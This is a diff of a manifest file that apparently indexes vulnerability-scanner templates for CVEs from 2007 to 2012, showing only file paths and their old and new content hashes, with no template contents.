-http/cves/2007/CVE-2007-5728.yaml:5b39a5e4f3dcf7385fccb35cad06f3c3a0a82f42
-http/cves/2008/CVE-2008-1059.yaml:f2f2ff44ef5d7274342070e549155996b095d961
-http/cves/2008/CVE-2008-1061.yaml:2283a8e83f8a8383fca573844d9b97734da0c153
-http/cves/2008/CVE-2008-1547.yaml:5262d695863f69a3e388827eeb95b6ba48a9472e
-http/cves/2008/CVE-2008-2398.yaml:8eae182ac0b4984b38382da110053219e6d46665
-http/cves/2008/CVE-2008-2650.yaml:be8591b445445bb7bef08c608bcd5e9a9a0d0774
-http/cves/2008/CVE-2008-4668.yaml:8ee31f4826f7e8bb25f2979da2d6939562d29402
+http/cves/2007/CVE-2007-4504.yaml:e1f251aa7bb247514b4a7335929689ed75a796a5
+http/cves/2007/CVE-2007-4556.yaml:9d514b86474553613455dfdb556e4211b30c5696
+http/cves/2007/CVE-2007-5728.yaml:a3d256fc6e0a550424cfc8aa89d31d3d89c340fc
+http/cves/2008/CVE-2008-1059.yaml:904e9e0247b33fd0c11e4dd5339c4834cd5cddf4
+http/cves/2008/CVE-2008-1061.yaml:74afa09cee1ef0e30c8893f39ececdcfcf4b21c1
+http/cves/2008/CVE-2008-1547.yaml:5726f97a827b2833457ec6640ea5292a67dd42a1
+http/cves/2008/CVE-2008-2398.yaml:c981fb87cb20bf922f8a6a41cf2af8877d5c22f6
+http/cves/2008/CVE-2008-2650.yaml:8f01def3b49e6ea113c2dac1d328811446173575
+http/cves/2008/CVE-2008-4668.yaml:b8b96f44b0f71b6d9b6278f4f65bc5161f7fb1eb
 http/cves/2008/CVE-2008-4764.yaml:4dc3e8cb4f49f10496228e48c9c0c539bda59b68
-http/cves/2008/CVE-2008-5587.yaml:486e6182bc3e4428fa4fc5c707a208f631610e2c
-http/cves/2008/CVE-2008-6080.yaml:bc83c01335632dfff5f6396d2e20acc8660c075a
-http/cves/2008/CVE-2008-6172.yaml:60967d286f8a63cf01c00b8e2ecdb27065c50cdc
-http/cves/2008/CVE-2008-6222.yaml:e26c9ad3dd2e85892b4fcda12235bb408ad04d89
-http/cves/2008/CVE-2008-6465.yaml:ca9179bc9e370c9850e1723a86f62282d15992ed
-http/cves/2008/CVE-2008-6668.yaml:b27677ebb2fa2e86a8454e785c03d8e8c40198ca
-http/cves/2008/CVE-2008-6982.yaml:a9c2b663918ebd18d85a9da0b2ff798efa7bc587
+http/cves/2008/CVE-2008-5587.yaml:d3c4fa8126527c7af3834c85350e39b53c4af6a2
+http/cves/2008/CVE-2008-6080.yaml:3fead1e0654f12ba326936c2a96b8b6e2e30d745
+http/cves/2008/CVE-2008-6172.yaml:e8cb0e8ecc4dba09be6a56b3a4becc69cc0c2dd1
+http/cves/2008/CVE-2008-6222.yaml:cc51b581074f6a2c20bd6f7427a56eff004d3b4f
+http/cves/2008/CVE-2008-6465.yaml:5d27b7cccfe7ce5ac6db272c68695c4ddea945e5
+http/cves/2008/CVE-2008-6668.yaml:2e7f954114cacbb8153deba30d753dabc5cb7adb
+http/cves/2008/CVE-2008-6982.yaml:d719c42ba1ef41aebbfaa769f6b31c68028c75d4
 http/cves/2008/CVE-2008-7269.yaml:a0f4f6219e16176af1340078eabff03834db0add
-http/cves/2009/CVE-2009-0347.yaml:f6c6fc698e1ae8a64b1bf4f0cb7d51668c6f1176
-http/cves/2009/CVE-2009-0545.yaml:917f670611355581c72dd3347980f0c172a693dd
-http/cves/2009/CVE-2009-0932.yaml:81ec0bf2db394632e4c1f84578b9d210faec2686
-http/cves/2009/CVE-2009-1151.yaml:97aff0f5347e14aaddb0fd23d79e8a899391b250
-http/cves/2009/CVE-2009-1496.yaml:c8c6803eccda3f9a36389fbd515869d3c9a7a511
-http/cves/2009/CVE-2009-1558.yaml:25a06cfe5caccf895deece0ddf71a4455c919f37
-http/cves/2009/CVE-2009-1872.yaml:c0c8536c654b4eb99709b49a45ec7d167a395383
-http/cves/2009/CVE-2009-2015.yaml:f13ceda1ecd48efe3144368703b46236bae79983
-http/cves/2009/CVE-2009-2100.yaml:44696ed2994b48a6bd36702b470e32fdb08c71b5
-http/cves/2009/CVE-2009-3053.yaml:ffdfe9d4821c2ed2154e191cd97e91c0a5398d0c
-http/cves/2009/CVE-2009-3318.yaml:2f413e2aae3bc31767230d0b8d6881e506d3a02f
-http/cves/2009/CVE-2009-4202.yaml:0abbaf4b76670f5d2c786f6f96e8107c7d623596
-http/cves/2009/CVE-2009-4223.yaml:5247bf3768879fd83653ced733ae88dbc0616193
-http/cves/2009/CVE-2009-4679.yaml:1c29b9a3121a367c6be62282f8dfd78cc19772b8
-http/cves/2009/CVE-2009-5020.yaml:11343b5b810df92a8d0bc8c0d4cc567e0c5057f8
-http/cves/2009/CVE-2009-5114.yaml:581040ddfd26c4adf4f9247eb42928f6f66cadf1
-http/cves/2010/CVE-2010-0157.yaml:942557654cfabbe11eb115db543b5edbbf578a74
-http/cves/2010/CVE-2010-0219.yaml:bd7b50a7ac723793b3906e55a596957ef60519b4
-http/cves/2010/CVE-2010-0467.yaml:acfff6b17fe07ec9b8dc3d9512dc69e31b93229f
-http/cves/2010/CVE-2010-0696.yaml:8d9407fe4495501dd6411a1455d060884aed0808
-http/cves/2010/CVE-2010-0759.yaml:5497f5591cb9a13479c3efd01eacbde120145dcc
-http/cves/2010/CVE-2010-0942.yaml:81d41c1f4dc6669fe1d8e800cdac6be317a44f19
-http/cves/2010/CVE-2010-0943.yaml:70f1b5af938c0c0655a4368766431e2e0f57b0f4
-http/cves/2010/CVE-2010-0944.yaml:cb9687ac7b16bc184d372f472099f9dc88bfcac7
-http/cves/2010/CVE-2010-0972.yaml:05b63a611517d6a7194834cb1d82d28a41d35f9f
-http/cves/2010/CVE-2010-0982.yaml:6c668ef396972505de0ed1d28a405f209b0b0528
-http/cves/2010/CVE-2010-0985.yaml:76fe34dc2777617f60d29f182c55ee4641fdf6f0
-http/cves/2010/CVE-2010-1056.yaml:412189954256e56cffdb3770af0425e74bf7d8ba
-http/cves/2010/CVE-2010-1081.yaml:eaa579bbd3969714fc5c3b078f50f29689a735ef
-http/cves/2010/CVE-2010-1217.yaml:e48397a2c1c4f4dd10ede7124ca9f90527e2e7e0
-http/cves/2010/CVE-2010-1219.yaml:7bfaf0a5f6b80b5509ed43e3ac75d27abce64c81
-http/cves/2010/CVE-2010-1302.yaml:bda066799e6f4f501b9f278ddaf2a6b4dba9c294
+http/cves/2009/CVE-2009-0347.yaml:d66eb7c12013ceaf3771614a195aec0a011a28bd
+http/cves/2009/CVE-2009-0545.yaml:bd3ca23602acde99a99a0c15e9dfdc4999d506c5
+http/cves/2009/CVE-2009-0932.yaml:21703933d99a2a485abf6c715cf2749cf2d0b016
+http/cves/2009/CVE-2009-1151.yaml:c45e10df8cba4edce749677afc775677780dc583
+http/cves/2009/CVE-2009-1496.yaml:660e9e8a92f80688219f56696ed5e510bea2ef52
+http/cves/2009/CVE-2009-1558.yaml:80b7d6b9ea2b6ffb22a21071599be04f26844e4e
+http/cves/2009/CVE-2009-1872.yaml:a0e8fd935976bb8b18f48be183e8d2215dcacd83
+http/cves/2009/CVE-2009-2015.yaml:d10a6b07c6f1e2391675fccea0f0fa31257874db
+http/cves/2009/CVE-2009-2100.yaml:551736e4ffb19abfdfa11cf5a777b03f85b2299a
+http/cves/2009/CVE-2009-3053.yaml:f7b0319e9ff45cb5882a3ce6335b0ca6196ebc7a
+http/cves/2009/CVE-2009-3318.yaml:dc15fecdfe9f2fb259e32f3931a0d3e309828d1b
+http/cves/2009/CVE-2009-4202.yaml:a739f18a0324f514368cdaeb6f42aef75d74358a
+http/cves/2009/CVE-2009-4223.yaml:202416b7c093360d57d20b209d51d59d9301749e
+http/cves/2009/CVE-2009-4679.yaml:4b018ce5bcf1d1f968612d5a257ac95a7c0cd0f4
+http/cves/2009/CVE-2009-5020.yaml:ab8064f4b8c720334f22f8ee79b97ba01b3dd6c3
+http/cves/2009/CVE-2009-5114.yaml:60bbca913ffedbd088f437a0a7ab97be2bcf8e87
+http/cves/2010/CVE-2010-0157.yaml:0a712e16d99f5160043e5e54540b5adaa4fc0879
+http/cves/2010/CVE-2010-0219.yaml:acc2eeb4ba265c7edbd110dd2967ee983949c6d2
+http/cves/2010/CVE-2010-0467.yaml:793fea30ace3e438070f003d0a573bd742893a31
+http/cves/2010/CVE-2010-0696.yaml:d118280c58ce49fdb6809e57211da49c3edd8549
+http/cves/2010/CVE-2010-0759.yaml:62476e2b8d038d4e21e1d99eca7aa2bac4774c54
+http/cves/2010/CVE-2010-0942.yaml:e4695e1db45395f09a4c6456ba0480f4f2898596
+http/cves/2010/CVE-2010-0943.yaml:3bb59176325e375eb82d73a1e9ca85c3fbd9966b
+http/cves/2010/CVE-2010-0944.yaml:31e8fb5dc025a6c1c39c43d648f43ec0327d8378
+http/cves/2010/CVE-2010-0972.yaml:45ee54fdef5965b5ee430773e2b2e0761bb51675
+http/cves/2010/CVE-2010-0982.yaml:d5ccd213835b5bb24ce0623eb292d7bd59f12064
+http/cves/2010/CVE-2010-0985.yaml:ddd70ed4e9c54e62b5ec6e8bb38cbaa13b626732
+http/cves/2010/CVE-2010-1056.yaml:68efaaee2e08d0b77c642911f155516c84e1b960
+http/cves/2010/CVE-2010-1081.yaml:a4d4c2219710e2493e1b8d61e67b084915816ce2
+http/cves/2010/CVE-2010-1217.yaml:4f7171877b3c30280df4ebbda9c3dc081dac3522
+http/cves/2010/CVE-2010-1219.yaml:9c1d35954a6e973f34f34aa6cf7f2a023028bbe8
+http/cves/2010/CVE-2010-1302.yaml:6b6eff2cd3a99f17a1f513787359915c0034c15b
 http/cves/2010/CVE-2010-1304.yaml:2b98e55f983b2b897eace3d588598a4e62af4b31
-http/cves/2010/CVE-2010-1305.yaml:f3bc7a9d9598fa11e1a054f167fd071f7087b0bc
-http/cves/2010/CVE-2010-1306.yaml:117fadbdc054a6537dd70e2ff45dbb4b0a7b7c3e
-http/cves/2010/CVE-2010-1307.yaml:bfa566db329c59332a65e294338756ebf9bd5b88
-http/cves/2010/CVE-2010-1308.yaml:7605e74b2c952acd98d3e1395a7a39329d55b8b4
-http/cves/2010/CVE-2010-1312.yaml:d1a474cebd714745168231e1e50d14edaef8ba5d
-http/cves/2010/CVE-2010-1313.yaml:78452160ad3d446d5a8f5929084a829ba0e35591
-http/cves/2010/CVE-2010-1314.yaml:fbbcdb7ef7e4f7c5c17b7b701328db2c01f7b3a6
-http/cves/2010/CVE-2010-1315.yaml:2e066dceaaaf5ede0126e9e2d734d74e47e9873d
-http/cves/2010/CVE-2010-1340.yaml:175f7238d48933a9c59ed1b3084b5f6af0a6f18b
-http/cves/2010/CVE-2010-1345.yaml:2455fbbe26459d19f097b15f790edf6bff599dc7
-http/cves/2010/CVE-2010-1352.yaml:b44e0490b38f215fc3eccd039ff0764477b1573c
-http/cves/2010/CVE-2010-1353.yaml:cfaac0257280a006feb57864ff308d366f9ea328
-http/cves/2010/CVE-2010-1354.yaml:850685cc65e89f38f3d891bb032e6db28b0de9c0
-http/cves/2010/CVE-2010-1429.yaml:4fc846296cee279ebbc00195510eeb1a9146804b
-http/cves/2010/CVE-2010-1461.yaml:2168dcd47684055691e0caa513729fc9d3bccf9b
-http/cves/2010/CVE-2010-1469.yaml:a809bfdd9267b1365b0aef1f9805509fdd0932b9
-http/cves/2010/CVE-2010-1470.yaml:a3c1fbee18df492a7dfdee2fec24094d23089f99
-http/cves/2010/CVE-2010-1471.yaml:1f6a28126227311cd72b7e91748dc13034f02d64
-http/cves/2010/CVE-2010-1472.yaml:2f1ca01a8bc24a542c4a9adbce519610687be4e8
-http/cves/2010/CVE-2010-1473.yaml:8c8ed32fed22ef6aff0517dcf73db33652e657a0
-http/cves/2010/CVE-2010-1474.yaml:7352365573c6d55c74f1b341225372bbc98e9d69
-http/cves/2010/CVE-2010-1475.yaml:9d250d54d81940bf06cac61614bf3718f7a374a1
-http/cves/2010/CVE-2010-1476.yaml:3e3c42b91c5303433c6ee82c0af0d6721cbb47db
-http/cves/2010/CVE-2010-1478.yaml:987d2ced09fc4370de4ed611b6900a9ffafd5069
-http/cves/2010/CVE-2010-1491.yaml:427c2e4bdb1d694959f4c3265ee33275b8f3fde4
-http/cves/2010/CVE-2010-1494.yaml:7eab5e4a4df50d653671ddc165cfae0593583ad5
-http/cves/2010/CVE-2010-1495.yaml:e1ba585c2026777caafeb6c80771478884b38f5b
-http/cves/2010/CVE-2010-1531.yaml:f9a0213af1f7cfe6ecdfc0a741d91f8e03941741
-http/cves/2010/CVE-2010-1532.yaml:561ebcefff31b62311adb3a18a576aac1a17804a
-http/cves/2010/CVE-2010-1533.yaml:c70da6c8cd66502d93d76eacbcc977087a0a591b
+http/cves/2010/CVE-2010-1305.yaml:4a0237d88c11098acd65b9b01f514c9f7662b695
+http/cves/2010/CVE-2010-1306.yaml:850ffb43695d6306e3703fce9f527b7a7eae3bf4
+http/cves/2010/CVE-2010-1307.yaml:792a3f5824a48934744148d873e53e70a5848814
+http/cves/2010/CVE-2010-1308.yaml:116ab1d72a505b3541958316a6dd7c43b3c800a0
+http/cves/2010/CVE-2010-1312.yaml:a9658240e959a79f46ef741f24369635554650b6
+http/cves/2010/CVE-2010-1313.yaml:c3dd1f8cde71f35a934c29cf974b60c6ca44e9ad
+http/cves/2010/CVE-2010-1314.yaml:30d6c6751cfae081b39c622860afd774d55d0db5
+http/cves/2010/CVE-2010-1315.yaml:112eff912e0f7771095a55890d36d07503bcac61
+http/cves/2010/CVE-2010-1340.yaml:d44f624f9dfdb52a31fd24bce23096f471164ddf
+http/cves/2010/CVE-2010-1345.yaml:b31ed6e9e8ac5db802d4c813b84c43758ab56f33
+http/cves/2010/CVE-2010-1352.yaml:cdbecbd2ae607a70b61562ac64c953d856e7de57
+http/cves/2010/CVE-2010-1353.yaml:71304337260415f72601866cd80e31b609a1cc05
+http/cves/2010/CVE-2010-1354.yaml:7f5a667faf54aead08142735cad5f939bd694394
+http/cves/2010/CVE-2010-1429.yaml:0e898e3df942636da00116c0097e9392638e27ca
+http/cves/2010/CVE-2010-1461.yaml:cb8618df5f3d8d0730618978f96b46a157346bcf
+http/cves/2010/CVE-2010-1469.yaml:b854ed255e55eb125f2cb38a43ecd4bef33781d5
+http/cves/2010/CVE-2010-1470.yaml:ff4e67215359d8bb772d5295540b6752b05dd83d
+http/cves/2010/CVE-2010-1471.yaml:40895b282661336d762d76c3cf4be5c38326bef8
+http/cves/2010/CVE-2010-1472.yaml:20d8c3c4920249e231e430f62a687398127b9f53
+http/cves/2010/CVE-2010-1473.yaml:7e5639080d730dafb27e68ae476192178b9c8267
+http/cves/2010/CVE-2010-1474.yaml:7ab9a939577f3cbba88721e2ea7125e0de6b5eae
+http/cves/2010/CVE-2010-1475.yaml:00e10e00a722d78236e1f633671c729fa0891d35
+http/cves/2010/CVE-2010-1476.yaml:83a60bc96c3e44026bf5947f77268aac5a5bd4f1
+http/cves/2010/CVE-2010-1478.yaml:e87278eae0183462d92c0d905fa97d4d8f82c7a7
+http/cves/2010/CVE-2010-1491.yaml:fdb1943fb29f185c376c77a9e38fcd7d9517199a
+http/cves/2010/CVE-2010-1494.yaml:57a28e33a0ecb15a6f087fe897aa01d9b7a6d448
+http/cves/2010/CVE-2010-1495.yaml:89cc6078d93a53b4dc5f34e91eff4643dd93eee4
+http/cves/2010/CVE-2010-1531.yaml:37c63a5b2c05746d34fd0c43a4ec747e6554e65c
+http/cves/2010/CVE-2010-1532.yaml:df251dd6487b9bb868648efa54c47147b35642db
+http/cves/2010/CVE-2010-1533.yaml:a895322693b4a226b8c3a4625569b5216630c4ab
 http/cves/2010/CVE-2010-1534.yaml:4bec33575cd9c9c3cbcc5da1f9e3bb43930f8dc1
-http/cves/2010/CVE-2010-1535.yaml:780dc4d7fce6a4dee0f02530952cec16e1a6d96b
-http/cves/2010/CVE-2010-1540.yaml:7ca2392ae873932ef74103f8e3fdfe05ba617197
-http/cves/2010/CVE-2010-1586.yaml:070e9ab315406d0f91b562aa2974585667494234
-http/cves/2010/CVE-2010-1601.yaml:eb525f8adc36561aacde142643a88f68d3213ebd
-http/cves/2010/CVE-2010-1602.yaml:78e40a5f8e6dbb787ff93df706f4b3cc4f156826
-http/cves/2010/CVE-2010-1603.yaml:ca726f2259165779dfd21056f0fed290c4f8f8bc
-http/cves/2010/CVE-2010-1607.yaml:0c9d7fe9ea568eb70ea91a3bdfcdc5d229941c6d
-http/cves/2010/CVE-2010-1653.yaml:acac34b49fe4eda362a7d064297bb52b064e8e60
-http/cves/2010/CVE-2010-1657.yaml:f05e51b449d33c1d8fdcf685e8d9adf20f8bb615
-http/cves/2010/CVE-2010-1658.yaml:a73a81a9cc0e7dead84b2038c1bc0938e35146a5
-http/cves/2010/CVE-2010-1659.yaml:ff29b2692a0632ec45726cf232cfcbf35bb28cf9
+http/cves/2010/CVE-2010-1535.yaml:3ac73936081158c6336cf9f74b2b541f5057fa34
+http/cves/2010/CVE-2010-1540.yaml:89ee170569ec114c5176910a9d61c30e758853d2
+http/cves/2010/CVE-2010-1586.yaml:30538b10e0cb8877888f2468eb2779b2fb4d0073
+http/cves/2010/CVE-2010-1601.yaml:2143c6cb9871f336451789865c99e9f2f3d10765
+http/cves/2010/CVE-2010-1602.yaml:12342bbc6c45e7cd564f96ee05b51fefcdbd07f9
+http/cves/2010/CVE-2010-1603.yaml:4d3c06f666b1b583e95762c45cdd75401b11dadc
+http/cves/2010/CVE-2010-1607.yaml:110736527cb2289e1ac6bb589e464aeb9172f636
+http/cves/2010/CVE-2010-1653.yaml:889177efee659f1b217cc10d2fb05107cab74195
+http/cves/2010/CVE-2010-1657.yaml:4440afb137504cb2d2ecf45df0beae1773ec2d36
+http/cves/2010/CVE-2010-1658.yaml:4236ffd6a7cbd4cb8cad647d8bb5eb412bb245f6
+http/cves/2010/CVE-2010-1659.yaml:16f630c33261d84069b8bc85751a3118cecc1268
 http/cves/2010/CVE-2010-1714.yaml:63a7cceead930d9289242729110e475f1e745819
 http/cves/2010/CVE-2010-1715.yaml:76548b6daae110826197fb8f669fda82a964e443
-http/cves/2010/CVE-2010-1717.yaml:a8ae2812a7efde29c425bdbe51ddf033ae379834
+http/cves/2010/CVE-2010-1717.yaml:8a2679cdc0ac7dadb5a556e8d7f897bf3035bf27
 http/cves/2010/CVE-2010-1718.yaml:a0f9660dcc91a1b00c0e7aeb262b3c158432737b
-http/cves/2010/CVE-2010-1719.yaml:f5060b87354cd0942a8f5b7edc06a56327798bd2
-http/cves/2010/CVE-2010-1722.yaml:bc0a84d2b33c7f9e8fce7a248cad94d6816ca352
-http/cves/2010/CVE-2010-1723.yaml:90d11fe3c9afce05f8d6ed18c270737d540deb0a
-http/cves/2010/CVE-2010-1858.yaml:9793ad32ea2fb7c6c858579f62063ded7f893213
-http/cves/2010/CVE-2010-1870.yaml:e899d4932cf66fa11ae71a3f046354f3813a94c6
-http/cves/2010/CVE-2010-1875.yaml:69d127d3f4c49fe93d78750a0f348fb21fbdb7b0
-http/cves/2010/CVE-2010-1878.yaml:5ba2bebc115feb8d33cb6a3704c47c2dc0e0f10a
-http/cves/2010/CVE-2010-1952.yaml:f7afcc83e5966a0ee24ecb0a0cff0e65fecd0ea7
-http/cves/2010/CVE-2010-1953.yaml:187dd4d949da50d23463bade31e198cc70239cc9
+http/cves/2010/CVE-2010-1719.yaml:8b1a7ebbebcf71e272b474344c4764d6940b512b
+http/cves/2010/CVE-2010-1722.yaml:0ad2ef09502bd175af9a51cb3cebdc2efd73ff67
+http/cves/2010/CVE-2010-1723.yaml:e763cf5761c0b3e43bc322668ea112814ea71f09
+http/cves/2010/CVE-2010-1858.yaml:75b48050de1c805a36bd1d30ad0de601859e8416
+http/cves/2010/CVE-2010-1870.yaml:a54959c1e8cd77f4d0a157038265805cf7f88438
+http/cves/2010/CVE-2010-1875.yaml:31efcc8a42d50b005f927282ba090460b098664d
+http/cves/2010/CVE-2010-1878.yaml:f9d1531bbd2b8b9512d7db3081590cf02f666dab
+http/cves/2010/CVE-2010-1952.yaml:226e6b6744875d20d9ff3032e7ab767bbf6708cf
+http/cves/2010/CVE-2010-1953.yaml:46cb8f055c538cd3583d0c298ddb91fb89e4455b
 http/cves/2010/CVE-2010-1954.yaml:9b5c369b6a44edb027264d1359547e425e5abaf0
-http/cves/2010/CVE-2010-1955.yaml:4bb2b8ddd62c0052f1eb8636354546674a310038
-http/cves/2010/CVE-2010-1956.yaml:a4974fe1df55683759b80e2941aea124aa8805f9
-http/cves/2010/CVE-2010-1957.yaml:887f2e8d238880903f70df2850d75984e46ab9cc
-http/cves/2010/CVE-2010-1977.yaml:8e4de5d89ebdb4df3cea08e7bd9905f97178b5a6
-http/cves/2010/CVE-2010-1979.yaml:cff91b0d115f8ddd35f9ee81476ffa2f7c33af8b
-http/cves/2010/CVE-2010-1980.yaml:53a029d41da1571a337fcd960880162ca1da1a47
-http/cves/2010/CVE-2010-1981.yaml:b0cd60e7b022ce22bc1e86bcbefc9963592cab0e
-http/cves/2010/CVE-2010-1982.yaml:5558bb628438930962c769b1b366629ceaa6874f
-http/cves/2010/CVE-2010-1983.yaml:87ccc4d948ca5c0849f0a190f18b0085ad749158
-http/cves/2010/CVE-2010-2033.yaml:8766b053f57663e6c35997e9a38d66bd7749b737
-http/cves/2010/CVE-2010-2034.yaml:b2e3d73b78d1c22aa4bb2a491c141b4160f4e043
-http/cves/2010/CVE-2010-2035.yaml:456cf8819c633c1d165737fdc700f08d7ebfabe1
-http/cves/2010/CVE-2010-2036.yaml:38d288f53c77a2c0aa846b7ddb049998cbd48ec0
-http/cves/2010/CVE-2010-2037.yaml:f4033dec8dc9f96aa57a20b8565a4073508cce95
-http/cves/2010/CVE-2010-2045.yaml:826476444d1521e030d981dcec56782b15c018f0
-http/cves/2010/CVE-2010-2050.yaml:6d246cc235d3a4dcc404aa6dfed3e1fffd30781b
-http/cves/2010/CVE-2010-2122.yaml:ae068a203d6187d9c86d9a5b33d241981cef1556
-http/cves/2010/CVE-2010-2128.yaml:52345f3d791cc13647aabf205387dbd3daaef8bd
-http/cves/2010/CVE-2010-2259.yaml:3da87f054295ba701c22c5738eb14cdb16b75bbc
-http/cves/2010/CVE-2010-2307.yaml:3981743d0b3a50ef9c5f3d4039b66e499686e4f3
-http/cves/2010/CVE-2010-2507.yaml:78d56cb22ba2f3755e1b3172fc236a591c73c833
+http/cves/2010/CVE-2010-1955.yaml:ff8439c5f5acefac8687c9559337fcd7dba4145a
+http/cves/2010/CVE-2010-1956.yaml:3628786bb924cbd73dd3e702e71a03d4c4bf02ca
+http/cves/2010/CVE-2010-1957.yaml:34fa8ded2243e90dc02f56696d8e4e848d901e36
+http/cves/2010/CVE-2010-1977.yaml:a32252255bbd11a877a094a6a776cec04ae77371
+http/cves/2010/CVE-2010-1979.yaml:ff348873911eb67a63884c74bf6930ed069a6c89
+http/cves/2010/CVE-2010-1980.yaml:1e8c70f987ca8aba255c14640c7d606117cbc4bb
+http/cves/2010/CVE-2010-1981.yaml:b9b1f783cb1136f4cb500f7cba3e0c301c279255
+http/cves/2010/CVE-2010-1982.yaml:851f9f7f7d3354c5fe0d00b025ff8e74b13d5839
+http/cves/2010/CVE-2010-1983.yaml:222567bebb91e923cbb511023a3b9b15d67a2cd5
+http/cves/2010/CVE-2010-2033.yaml:699872df1a1c7fd486547948ddb378b28d56cc62
+http/cves/2010/CVE-2010-2034.yaml:c40ff5aeb6a0eafa53af894efb6fcf8d7d3b23c6
+http/cves/2010/CVE-2010-2035.yaml:1de31f4b66b0c3a1cd236077e34ddfa991b61ef8
+http/cves/2010/CVE-2010-2036.yaml:a4f118648e4e68e1d84d8d67ab9f5f59378f9531
+http/cves/2010/CVE-2010-2037.yaml:c2d3dab7495847f4cdf3e90da01bf3e528ae9427
+http/cves/2010/CVE-2010-2045.yaml:f4a001696a353616d1860806e313e261347d706b
+http/cves/2010/CVE-2010-2050.yaml:89f2054a6f5d8f95fe159d5e6d2f8e81d95336de
+http/cves/2010/CVE-2010-2122.yaml:be7cee6886b2740ff05169c9bc0a597108b47346
+http/cves/2010/CVE-2010-2128.yaml:c7715092442426261d608e2183e8eb194541cac3
+http/cves/2010/CVE-2010-2259.yaml:c44304b38b4ed1a339b236cda612f932cfa9be52
+http/cves/2010/CVE-2010-2307.yaml:3e2e5e3ad2f73b183846d52ccebb7fa73e0ec76f
+http/cves/2010/CVE-2010-2507.yaml:1fa5c0f00650cf312f96c991a64888c59d294e20
 http/cves/2010/CVE-2010-2680.yaml:8e70dbbbd0f34a6b5e6eee7c7a34d9fe4d25c4d6
-http/cves/2010/CVE-2010-2682.yaml:9e7e230de16a989982e0e77cd8d2fef4e1d7a29f
-http/cves/2010/CVE-2010-2857.yaml:5e4b5f0528947544816bfba68d7a5ecace2002e8
-http/cves/2010/CVE-2010-2861.yaml:db65f6c828380eaaecacf0d6b7d9ccd58d01bafd
-http/cves/2010/CVE-2010-2918.yaml:b61b606fa81a1b6f3b54ebca599340d5fc2b0dbb
+http/cves/2010/CVE-2010-2682.yaml:a4414cf61e1f05bfa8a0908519a3ec707717da90
+http/cves/2010/CVE-2010-2857.yaml:82aec54c18541038d25b715392d16386bf3894c3
+http/cves/2010/CVE-2010-2861.yaml:d4eed5eec3202a134a9bbaaac11f268bade9c314
+http/cves/2010/CVE-2010-2918.yaml:8df8cceedca9e8f19dd3049ef43aab650e9dc284
 http/cves/2010/CVE-2010-2920.yaml:d1ce1d280d490cc143aecf37c5825e92b5f34665
-http/cves/2010/CVE-2010-3203.yaml:8409f1844e9e3f600aad7f99c6f6a4e91d5e0d94
-http/cves/2010/CVE-2010-3426.yaml:bcc45a1c9a5a1ed71474db479387024a4e69c9d6
-http/cves/2010/CVE-2010-4231.yaml:964ea4f31fba6cb99cba4008bc999917a32cf4b7
-http/cves/2010/CVE-2010-4239.yaml:b81db8496a3640e44d7f2f8329412aa25c7ef3d3
-http/cves/2010/CVE-2010-4282.yaml:9a70e02313e9aec47e6e00a3e6d433560421909d
-http/cves/2010/CVE-2010-4617.yaml:2bd313340313ac9320227855af688f877ca32298
-http/cves/2010/CVE-2010-4719.yaml:939adf0cacad182b533dfeda24b5617c415cc873
-http/cves/2010/CVE-2010-4769.yaml:73e12f7996f9abc456922f1247180d862fd9876c
-http/cves/2010/CVE-2010-4977.yaml:0733a01b4959602e2b62435133b67dfb2f3bbbfb
-http/cves/2010/CVE-2010-5028.yaml:1a136cc961f91e1e43863165a7328b5e3408e53f
-http/cves/2010/CVE-2010-5278.yaml:a996fd210b4b65af63f0d2bd1a0c65ca210cea10
-http/cves/2010/CVE-2010-5286.yaml:341a10e024fa36f6d98e91881e1d4a8662ea9ff6
-http/cves/2011/CVE-2011-0049.yaml:0c02a61c30709ef85b8a94142ce3f2949225b001
-http/cves/2011/CVE-2011-1669.yaml:2a7076ee4e81ff377cb1ee03ebd2cbf8c8d87233
-http/cves/2011/CVE-2011-2744.yaml:2dd47de4de9d2d059629bc7a0de9d6c8a84529d0
-http/cves/2011/CVE-2011-2780.yaml:113fdaafc205092e1db7d9e403b3f132f8785664
-http/cves/2011/CVE-2011-3315.yaml:ee23e37c280c1e798d4bc93acda8485a45962c0a
-http/cves/2011/CVE-2011-4336.yaml:c50e711e30e77f6eafa5d5fc875bb1d37760857a
-http/cves/2011/CVE-2011-4618.yaml:156fda102c74a3c5e43c4eee3285efaabb9087ec
-http/cves/2011/CVE-2011-4624.yaml:5c4abe912f0d278bceb6525dc1365a6a0d0e5c62
-http/cves/2011/CVE-2011-4804.yaml:c3726482323a94be9d10c6a49dddc9b3be9579e3
-http/cves/2011/CVE-2011-4926.yaml:286ac30cb6481a2b7dae2e7bf36eed0b8930a24a
-http/cves/2011/CVE-2011-5106.yaml:8dc65d5e0a78284103f52743e257864d4e04864e
-http/cves/2011/CVE-2011-5107.yaml:0f4cd553e83541d21a5672984168cbf39a655db5
-http/cves/2011/CVE-2011-5179.yaml:2c5c4d1a12182047c5507a4f60cd8d446b2b9196
-http/cves/2011/CVE-2011-5181.yaml:edb47f66935054ae3b5fbf5e577f5a594c604f7b
-http/cves/2011/CVE-2011-5252.yaml:2608a2c487f32210b452690354369b1336407add
-http/cves/2011/CVE-2011-5265.yaml:e4f4948461ce52ccea61d1b8f0ca2eb645cea81f
-http/cves/2012/CVE-2012-0392.yaml:f092dea5fc575cc77f216f3acb741b103c50f05c
-http/cves/2012/CVE-2012-0394.yaml:e79227b0452a23968618d0c36138c315f3fca007
-http/cves/2012/CVE-2012-0896.yaml:4654b44dbba704483ce6749ded9be1bce0220437
-http/cves/2012/CVE-2012-0901.yaml:1821efc38ce7056fcd946c2d6268e0d4e9471adf
-http/cves/2012/CVE-2012-0981.yaml:6db9ac0afcaa8f93a2cfa2db003db4a757a182b3
-http/cves/2012/CVE-2012-0991.yaml:c62071f0fc2f7c9f66b6f49b770daa88bd98d052
-http/cves/2012/CVE-2012-0996.yaml:294bb26e8c579621cbbf1fdf015d22106a72f934
-http/cves/2012/CVE-2012-1226.yaml:6944552869e0ba49dd460289d87a5fffe7cfd4bf
-http/cves/2012/CVE-2012-1823.yaml:b3ca96913fa1e45c2dc8a76d1c3861e710dcaccf
-http/cves/2012/CVE-2012-1835.yaml:757fdb1982aa06f434e583186cdc534ab63b793d
-http/cves/2012/CVE-2012-2371.yaml:9c3798f8635bd8d49c1c43de5184fe81b572530f
-http/cves/2012/CVE-2012-3153.yaml:16366ebaab1cbce342d2b335ea15aabc0394cc27
-http/cves/2012/CVE-2012-4032.yaml:82f0b5e2baa93237594b6d8662202827915ac003
-http/cves/2012/CVE-2012-4242.yaml:30632aac073acd466a3faa842f6f97586f58abd4
